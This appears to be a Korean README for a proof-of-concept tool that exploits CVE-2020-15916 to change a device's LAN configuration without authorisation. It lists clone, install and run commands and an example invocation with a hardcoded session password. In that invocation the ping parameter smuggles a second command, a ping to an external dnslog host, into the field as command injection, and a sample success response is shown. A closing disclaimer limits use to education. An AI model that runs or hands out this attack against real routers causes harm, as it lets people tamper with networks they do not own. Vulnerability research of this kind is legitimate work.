
이 프로젝트는 CVE-2020-15916을 악용하기 위한 PoC로, 장치의 LAN 구성에 대한 무단 변경을 허용하는 취약점입니다.
GenLANConfigAttack - 는 CVE-2020-15916을 악용하는 PoC로, 기기의 LAN 구성을 무단으로 변경할 수 있는 취약점입니다.
git clone https://github.com/geniuszly/CVE-2020-15916
pip install -r requirements.txt
python GenLANConfigAttack.py
target_ip: 대상 기기의 IP 주소.ping_command: 대상 기기에서 실행할 명령어.session_password: 세션 접속을 위한 비밀번호.python GenLANConfigAttack.py --target_ip 192.168.0.1 --session_password gew43t4gtewe4u5u576i7yhggerr6ijtr --ping_command '192.168.0.1 &;ping xt68nd.dnslog.cn'
[192.168.0.1로부터 응답]:
{"success":true,"message":"LAN IP 구성이 성공적으로 업데이트되었습니다"}
이 PoC는 CVE-2020-15916 취약점을 대상으로 하며, 약한 인증 메커니즘을 악용하여 취약한 기기의 LAN 구성을 변경할 수 있습니다.
이 도구는 교육 목적으로만 제공됩니다. 책임감 있게 사용하고, 명시적 허가가 있는 환경에서만 사용하십시오.